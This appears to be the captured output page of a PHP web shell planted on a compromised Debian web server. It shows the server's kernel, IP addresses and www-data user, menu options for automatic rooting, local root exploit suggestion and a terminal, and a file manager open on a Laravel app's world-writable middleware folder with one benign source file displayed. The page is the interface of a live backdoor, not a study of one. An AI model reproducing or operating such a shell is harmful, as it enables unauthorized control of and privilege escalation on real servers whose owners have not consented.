Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
app /
Http /
Middleware /
Delete
Unzip
Name
Size
Permission
Date
Action
Authenticate.php
504
B
-rwxrwxrwx
2022-04-21 13:43
CheckForMaintenanceMode.php
335
B
-rwxrwxrwx
2022-04-21 13:43
EncryptCookies.php
294
B
-rwxrwxrwx
2022-04-21 13:43
JsonApi.php
470
B
-rwxrwxrwx
2022-04-21 13:43
RedirectIfAuthenticated.php
582
B
-rwxrwxrwx
2022-04-21 13:43
TrimStrings.php
340
B
-rwxrwxrwx
2022-04-21 13:43
TrustProxies.php
436
B
-rwxrwxrwx
2022-04-21 13:43
VerifyCsrfToken.php
463
B
-rwxrwxrwx
2022-04-21 13:43
Save
Rename
<?php namespace App\Http\Middleware; use Illuminate\Auth\Middleware\Authenticate as Middleware; use Illuminate\Http\Request; class Authenticate extends Middleware { /** * Get the path the user should be redirected to when they are not authenticated. * * @param Request $request * @return string|null */ protected function redirectTo($request) { if (! $request->expectsJson()) { return route('login'); } return null; } }